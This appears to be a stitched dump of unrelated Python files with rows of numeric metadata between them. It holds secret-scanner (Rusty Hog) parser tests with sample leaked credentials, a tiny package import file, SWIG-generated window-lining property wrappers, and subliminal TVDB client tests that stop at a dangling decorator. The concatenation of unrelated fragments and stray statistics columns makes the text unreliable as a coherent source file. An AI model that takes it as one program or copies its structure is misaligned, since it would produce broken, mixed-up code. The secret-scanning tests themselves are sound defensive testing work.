self.assertIn("**Date:** 2020-04-15 12:47:20", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within git repositories.", findings[0].mitigation)
def test_parse_file_with_no_vuln_has_no_finding_duorchog(self):
testfile = open("unittests/scans/rusty_hog/durochog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_durochog(self):
testfile = open("unittests/scans/rusty_hog/durochog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Duroc Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_durochog(self):
testfile = open("unittests/scans/rusty_hog/durochog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Duroc Hog", Test())
self.assertEqual(4, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_durochog_content(self):
testfile = open("unittests/scans/rusty_hog/durochog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Duroc Hog", Test())
self.assertEqual(findings[0].title, "password (Password) found in path /scan_folder/unittests/scans/sonarqube/sonar-no-finding.html")
self.assertIn("**This string was found:** ['password = getEncryptedPass()']", findings[0].description)
self.assertIn("**Path of Issue:** /scan_folder/unittests/scans/sonarqube/sonar-no-finding.html", findings[0].description)
self.assertIn("**Linenum of Issue:** 7712", findings[0].description)
self.assertIn("**Diff:** $password = getEncryptedPass();", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within directories, files, and archives.", findings[0].mitigation)
def test_parse_file_with_no_vuln_has_no_finding_gottingenhog(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_gottingenhog(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Gottingen Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_gottingenhog(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Gottingen Hog", Test())
self.assertEqual(10, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_gottingenhog_content(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Gottingen Hog", Test())
self.assertEqual(findings[0].title, "password found in Jira ID TEST-123 (Issue Description)")
self.assertIn("**This string was found:** ['password: jeans']", findings[0].description)
self.assertIn("**JIRA Issue ID:** TEST-123", findings[0].description)
self.assertIn("**JIRA location:** Issue Description", findings[0].description)
self.assertIn("**JIRA url:** https://jira.com/browse/TEST-123", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within JIRA Tickets.", findings[0].mitigation)
def test_parse_file_with_no_vuln_has_no_finding_essexhog(self):
testfile = open("unittests/scans/rusty_hog/essexhog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_essexhog(self):
testfile = open("unittests/scans/rusty_hog/essexhog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Essex Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_essexhog(self):
testfile = open("unittests/scans/rusty_hog/essexhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Essex Hog", Test())
self.assertEqual(3, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_essexhog_content(self):
testfile = open("unittests/scans/rusty_hog/essexhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Essex Hog", Test())
self.assertEqual(findings[0].title, "SSH (EC) private key found in Confluence Page ID 12345")
self.assertIn("-----BEGIN EC PRIVATE KEY-----", findings[0].description)
self.assertIn("**Confluence URL:** https://confluence.com/pages/viewpage.action?pageId=12345", findings[0].description)
self.assertIn("**Confluence Page ID:** 12345", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within Confluence Pages.", findings[0].mitigation)
| 64.333333
| 168
| 0.728295
| 969
| 7,913
| 5.723426
| 0.154799
| 0.04057
| 0.074648
| 0.073567
| 0.845835
| 0.816985
| 0.76722
| 0.727191
| 0.705914
| 0.687523
| 0
| 0.032016
| 0.159232
| 7,913
| 122
| 169
| 64.860656
| 0.801593
| 0.029192
| 0
| 0.457143
| 0
| 0.019048
| 0.330989
| 0.153966
| 0
| 0
| 0
| 0
| 0.352381
| 1
| 0.152381
| false
| 0.047619
| 0.028571
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b2e78a69de6fc2be7c4e9fe169690ca194efddff
| 57
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from ._pkg0_1_0_0_0 import *
from ._pkg0_1_0_0_1 import *
| 28.5
| 28
| 0.807018
| 14
| 57
| 2.571429
| 0.357143
| 0.166667
| 0.5
| 0.555556
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0.122807
| 57
| 2
| 29
| 28.5
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
65097c30e1205d3034b5c43cf99668a38c509448
| 12,340
|
py
|
Python
|
SimModel_Python_API/simmodel_swig/Release/SimWindowLiningProps_WindowLiningProps_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 3
|
2016-05-30T15:12:16.000Z
|
2022-03-22T08:11:13.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimWindowLiningProps_WindowLiningProps_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 21
|
2016-06-13T11:33:45.000Z
|
2017-05-23T09:46:52.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimWindowLiningProps_WindowLiningProps_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimWindowLiningProps_WindowLiningProps_Default', [dirname(__file__)])
except ImportError:
import _SimWindowLiningProps_WindowLiningProps_Default
return _SimWindowLiningProps_WindowLiningProps_Default
if fp is not None:
try:
_mod = imp.load_module('_SimWindowLiningProps_WindowLiningProps_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimWindowLiningProps_WindowLiningProps_Default = swig_import_helper()
del swig_import_helper
else:
import _SimWindowLiningProps_WindowLiningProps_Default
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import base
# SWIG-generated proxy class: do not edit by hand.
class SimWindowLiningProps(base.SimPropertySetDefinition):
    """Python proxy for the C++ ``SimWindowLiningProps`` property set,
    backed by the ``_SimWindowLiningProps_WindowLiningProps_Default``
    extension module."""
    # Merge the parent's SWIG setter dispatch table into this class.
    __swig_setmethods__ = {}
    for _s in [base.SimPropertySetDefinition]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps, name, value)
    # Same merge for the getter dispatch table.
    __swig_getmethods__ = {}
    for _s in [base.SimPropertySetDefinition]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps, name)
    __repr__ = _swig_repr
    # Property accessors: each forwards to the C extension; *args selects
    # between the getter and setter overloads on the native side.
    def LiningDepth(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_LiningDepth(self, *args)
    def LiningThickness(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_LiningThickness(self, *args)
    def TransomThickness(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_TransomThickness(self, *args)
    def MullionThickness(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_MullionThickness(self, *args)
    def FirstTransomOffset(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_FirstTransomOffset(self, *args)
    def SecondTransomOffset(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_SecondTransomOffset(self, *args)
    def FirstMullionOffset(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_FirstMullionOffset(self, *args)
    def SecondMullionOffset(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_SecondMullionOffset(self, *args)
    def ShapeAspectStyle(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_ShapeAspectStyle(self, *args)
    def __init__(self, *args):
        # Construct the native object; `self.this` holds the C pointer.
        this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps(*args)
        try:
            self.this.append(this)
        except:
            self.this = this
    def _clone(self, f=0, c=None):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps__clone(self, f, c)
    # Native destructor; __del__ is a no-op because SWIG manages disposal.
    __swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps
    __del__ = lambda self: None
# Register the proxy class with the extension module's type system.
SimWindowLiningProps_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_swigregister
SimWindowLiningProps_swigregister(SimWindowLiningProps)
# SWIG-generated proxy class: do not edit by hand.
class SimWindowLiningProps_WindowLiningProps(SimWindowLiningProps):
    """Proxy for the ``SimWindowLiningProps_WindowLiningProps`` C++
    subclass; inherits all property accessors from the base proxy."""
    # Inherit and extend the SWIG setter/getter dispatch tables.
    __swig_setmethods__ = {}
    for _s in [SimWindowLiningProps]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps_WindowLiningProps, name, value)
    __swig_getmethods__ = {}
    for _s in [SimWindowLiningProps]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps_WindowLiningProps, name)
    __repr__ = _swig_repr
    def __init__(self, *args):
        # Construct the native object; `self.this` holds the C pointer.
        this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps_WindowLiningProps(*args)
        try:
            self.this.append(this)
        except:
            self.this = this
    def _clone(self, f=0, c=None):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps__clone(self, f, c)
    __swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps_WindowLiningProps
    __del__ = lambda self: None
# Register the proxy class with the extension module's type system.
SimWindowLiningProps_WindowLiningProps_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_swigregister
SimWindowLiningProps_WindowLiningProps_swigregister(SimWindowLiningProps_WindowLiningProps)
# SWIG-generated proxy class: do not edit by hand.
class SimWindowLiningProps_WindowLiningProps_Default(SimWindowLiningProps_WindowLiningProps):
    """Proxy for the ``..._Default`` concrete C++ variant of the
    window-lining property set."""
    # Inherit and extend the SWIG setter/getter dispatch tables.
    __swig_setmethods__ = {}
    for _s in [SimWindowLiningProps_WindowLiningProps]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps_WindowLiningProps_Default, name, value)
    __swig_getmethods__ = {}
    for _s in [SimWindowLiningProps_WindowLiningProps]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps_WindowLiningProps_Default, name)
    __repr__ = _swig_repr
    def __init__(self, *args):
        # Construct the native object; `self.this` holds the C pointer.
        this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps_WindowLiningProps_Default(*args)
        try:
            self.this.append(this)
        except:
            self.this = this
    def _clone(self, f=0, c=None):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default__clone(self, f, c)
    __swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps_WindowLiningProps_Default
    __del__ = lambda self: None
# Register the proxy class with the extension module's type system.
SimWindowLiningProps_WindowLiningProps_Default_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_swigregister
SimWindowLiningProps_WindowLiningProps_Default_swigregister(SimWindowLiningProps_WindowLiningProps_Default)
# SWIG-generated proxy class: do not edit by hand.
class SimWindowLiningProps_WindowLiningProps_Default_sequence(base.sequence_common):
    """Proxy for a native sequence (STL-style container) of
    ``SimWindowLiningProps_WindowLiningProps_Default`` objects.  The
    methods mirror the C++ container API (begin/end/at/push_back/...)."""
    # Inherit and extend the SWIG setter/getter dispatch tables.
    __swig_setmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps_WindowLiningProps_Default_sequence, name, value)
    __swig_getmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps_WindowLiningProps_Default_sequence, name)
    __repr__ = _swig_repr
    def __init__(self, *args):
        # Construct the native container; `self.this` holds the C pointer.
        this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps_WindowLiningProps_Default_sequence(*args)
        try:
            self.this.append(this)
        except:
            self.this = this
    # Container API, forwarded verbatim to the C extension.
    def assign(self, n, x):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_assign(self, n, x)
    def begin(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_begin(self, *args)
    def end(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_end(self, *args)
    def rbegin(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_rbegin(self, *args)
    def rend(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_rend(self, *args)
    def at(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_at(self, *args)
    def front(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_front(self, *args)
    def back(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_back(self, *args)
    def push_back(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_push_back(self, *args)
    def pop_back(self):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_pop_back(self)
    def detach_back(self, pop=True):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_detach_back(self, pop)
    def insert(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_insert(self, *args)
    def erase(self, *args):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_erase(self, *args)
    def detach(self, position, r, erase=True):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_detach(self, position, r, erase)
    def swap(self, x):
        return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_swap(self, x)
    __swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps_WindowLiningProps_Default_sequence
    __del__ = lambda self: None
# Register the proxy class with the extension module's type system.
SimWindowLiningProps_WindowLiningProps_Default_sequence_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_swigregister
SimWindowLiningProps_WindowLiningProps_Default_sequence_swigregister(SimWindowLiningProps_WindowLiningProps_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 45.201465
| 187
| 0.774716
| 1,177
| 12,340
| 7.558199
| 0.129992
| 0.382644
| 0.390737
| 0.230216
| 0.728417
| 0.68424
| 0.643435
| 0.518323
| 0.458746
| 0.394447
| 0
| 0.001633
| 0.156402
| 12,340
| 272
| 188
| 45.367647
| 0.85293
| 0.023825
| 0
| 0.37619
| 1
| 0
| 0.027252
| 0.00781
| 0
| 0
| 0
| 0
| 0
| 1
| 0.17619
| false
| 0.009524
| 0.052381
| 0.138095
| 0.566667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
65467e19011fcc02b1dcab797dc65337f2d1d443
| 13,316
|
py
|
Python
|
tests/test_tvdb.py
|
eSoares/subliminal
|
e25589dbcc5b2455bf9f0b49cf2083bb0eae449f
|
[
"MIT"
] | 1,838
|
2015-01-01T16:48:32.000Z
|
2022-03-31T16:22:36.000Z
|
tests/test_tvdb.py
|
eSoares/subliminal
|
e25589dbcc5b2455bf9f0b49cf2083bb0eae449f
|
[
"MIT"
] | 650
|
2015-01-04T23:13:51.000Z
|
2022-03-13T19:45:56.000Z
|
tests/test_tvdb.py
|
eSoares/subliminal
|
e25589dbcc5b2455bf9f0b49cf2083bb0eae449f
|
[
"MIT"
] | 327
|
2015-01-04T20:17:32.000Z
|
2022-03-15T10:52:23.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
import os
import time
import pytest
import requests
from vcr import VCR
from subliminal import __short_version__
from subliminal.video import Episode
from subliminal.refiners.tvdb import TVDBClient, refine, series_re
# HTTP interactions are recorded/replayed via vcrpy cassettes stored as
# YAML files under tests/cassettes/tvdb.  VCR_RECORD_MODE defaults to
# 'once': replay an existing cassette, record only if it is missing.
vcr = VCR(path_transformer=lambda path: path + '.yaml',
          record_mode=os.environ.get('VCR_RECORD_MODE', 'once'),
          cassette_library_dir=os.path.realpath(os.path.join('tests', 'cassettes', 'tvdb')))
@pytest.fixture()
def client():
    # Fresh TVDBClient per test, configured with the project's API key and
    # a Subliminal user agent.
    return TVDBClient('2AE5D1E42E7194B9', headers={'User-Agent': 'Subliminal/%s' % __short_version__})


# --- series_re: parsing of "<series> (<year>|<country>)" strings ---

def test_series_re_no_year():
    # A bare name yields no year.
    groups = series_re.match('Series Name').groupdict()
    assert groups['series'] == 'Series Name'
    assert groups['year'] is None


def test_series_re_year_parenthesis():
    # "(2013)" is captured as the year, not part of the series name.
    groups = series_re.match('Series Name (2013)').groupdict()
    assert groups['series'] == 'Series Name'
    assert groups['year'] == '2013'
    assert groups['country'] is None


def test_series_re_text_parenthesis():
    # Non-year, non-country parenthesised text stays inside the series name.
    groups = series_re.match('Series Name (Rock)').groupdict()
    assert groups['series'] == 'Series Name (Rock)'
    assert groups['year'] is None
    assert groups['country'] is None


def test_series_re_text_unclosed_parenthesis():
    # An unclosed parenthesis is treated as literal text in the name.
    groups = series_re.match('Series Name (2013').groupdict()
    assert groups['series'] == 'Series Name (2013'
    assert groups['year'] is None
    assert groups['country'] is None


def test_series_re_country():
    # A two-letter code in parentheses is captured as the country.
    groups = series_re.match('Series Name (UK)').groupdict()
    assert groups['series'] == 'Series Name'
    assert groups['year'] is None
    assert groups['country'] == 'UK'


# --- TVDBClient construction: language, session and header handling ---

def test_language():
    # Default language is 'en'; changing .language updates the session header.
    client = TVDBClient()
    assert 'Accept-Language' in client.session.headers
    assert client.session.headers['Accept-Language'] == 'en'
    assert client.language == 'en'
    client.language = 'fr'
    assert client.session.headers['Accept-Language'] == 'fr'
    assert client.language == 'fr'


def test_session():
    # A caller-provided requests session is used as-is (same object).
    session = requests.Session()
    client = TVDBClient(session=session)
    assert client.session is session


def test_headers():
    # Extra constructor headers are merged into the session headers.
    client = TVDBClient(headers={'X-Test': 'Value'})
    assert 'X-Test' in client.session.headers
    assert client.session.headers['X-Test'] == 'Value'
# --- Integration tests: real TheTVDB API calls replayed from cassettes ---

@pytest.mark.integration
@vcr.use_cassette
def test_login_error():
    # An invalid API key makes login fail with an HTTP error.
    client = TVDBClient('1234', headers={'User-Agent': 'Subliminal/%s' % __short_version__})
    with pytest.raises(requests.HTTPError):
        client.login()


@pytest.mark.integration
@vcr.use_cassette
def test_login(client):
    # Before login there is no token and it counts as expired; after login
    # a fresh token with a recent timestamp is held.
    assert client.token is None
    assert client.token_date <= datetime.utcnow() - timedelta(hours=1)
    assert client.token_expired
    client.login()
    assert client.token is not None
    assert client.token_date > datetime.utcnow() - timedelta(seconds=1)
    assert client.token_expired is False


@pytest.mark.integration
@vcr.use_cassette
def test_token_needs_refresh(client, monkeypatch):
    # Shrink the refresh interval so the token goes stale within the test.
    monkeypatch.setattr(client, 'refresh_token_every', timedelta(milliseconds=100))
    assert client.token_needs_refresh
    client.login()
    assert not client.token_needs_refresh
    time.sleep(0.5)
    assert client.token_needs_refresh


@pytest.mark.integration
@vcr.use_cassette
def test_refresh_token(client):
    # Refreshing yields a token different from the one obtained at login.
    client.login()
    old_token = client.token
    time.sleep(0.5)
    client.refresh_token()
    assert client.token != old_token


@pytest.mark.integration
@vcr.use_cassette
def test_search_series(client):
    # Exact-name search returns a single match with known id/air date.
    data = client.search_series('The Big Bang Theory')
    assert len(data) == 1
    series = data[0]
    assert series['id'] == 80379
    assert series['firstAired'] == '2007-09-24'


@pytest.mark.integration
@vcr.use_cassette
def test_search_series_wrong_name(client):
    # A misspelled name yields no result (None, not an empty list).
    data = client.search_series('The Bing Bag Theory')
    assert data is None


@pytest.mark.integration
@vcr.use_cassette
def test_search_series_no_parameter(client):
    # The API rejects a search without any criterion.
    with pytest.raises(requests.HTTPError):
        client.search_series()


@pytest.mark.integration
@vcr.use_cassette
def test_search_series_multiple_parameters(client):
    # The API rejects a search combining name and IMDB id.
    with pytest.raises(requests.HTTPError):
        client.search_series('The Big Bang Theory', 'tt0898266')


@pytest.mark.integration
@vcr.use_cassette
def test_get_series(client):
    # Fetch by TVDB id and check the well-known metadata fields.
    series = client.get_series(80379)
    assert series['id'] == 80379
    assert series['firstAired'] == '2007-09-24'
    assert series['imdbId'] == 'tt0898266'


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_wrong_id(client):
    # An unknown id yields None.
    series = client.get_series(999999999)
    assert series is None


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_actors(client):
    # Actors list is returned for a valid series id.
    actors = client.get_series_actors(80379)
    assert len(actors) == 8
    assert 'Jim Parsons' in {a['name'] for a in actors}


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_actors_wrong_id(client):
    # An unknown id yields None.
    actors = client.get_series_actors(999999999)
    assert actors is None


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes(client):
    # First page of a paginated episode listing (100 items per page).
    episodes_data = client.get_series_episodes(80379)
    assert episodes_data['links']['first'] == 1
    assert episodes_data['links']['last'] == 3
    assert episodes_data['links']['next'] == 2
    assert episodes_data['links']['prev'] is None
    assert len(episodes_data['data']) == 100


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes_page(client):
    # A middle page exposes both prev and next links.
    episodes_data = client.get_series_episodes(80379, page=2)
    assert episodes_data['links']['first'] == 1
    assert episodes_data['links']['last'] == 3
    assert episodes_data['links']['next'] == 3
    assert episodes_data['links']['prev'] == 1
    assert len(episodes_data['data']) == 100


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes_wrong_id(client):
    # An unknown series id yields None.
    episodes_data = client.get_series_episodes(999999999)
    assert episodes_data is None


@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes_wrong_page(client):
    # A page beyond the last yields None.
    episodes_data = client.get_series_episodes(80379, page=10)
    assert episodes_data is None


@pytest.mark.integration
@vcr.use_cassette
def test_query_series_episodes(client):
    # Filtering by season+episode returns exactly one match.
    episodes_data = client.query_series_episodes(80379, aired_season=7, aired_episode=5)
    assert episodes_data['links']['first'] == 1
    assert episodes_data['links']['last'] == 1
    assert episodes_data['links']['next'] is None
    assert episodes_data['links']['prev'] is None
    assert len(episodes_data['data']) == 1
    assert episodes_data['data'][0]['episodeName'] == 'The Workplace Proximity'


@pytest.mark.integration
@vcr.use_cassette
def test_query_series_episodes_wrong_season(client):
    # A non-existent season yields None.
    episodes_data = client.query_series_episodes(80379, aired_season=99)
    assert episodes_data is None
# --- refine(): enrich a minimally-populated Episode with TVDB metadata.
# Each test builds an Episode from lowercased fixture data and asserts the
# refiner restores the canonical series/title/id fields of the fixture.

@pytest.mark.integration
@vcr.use_cassette
def test_refine(episodes):
    # Baseline: a straightforward, unambiguous series.
    video = episodes['bbt_s07e05']
    episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_partial(episodes):
    # Only the part of the series name before ':' is supplied.
    video = episodes['csi_s15e18']
    episode = Episode(video.name.lower(), video.series.lower().split(':')[0], video.season, video.episode)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id


@pytest.mark.integration
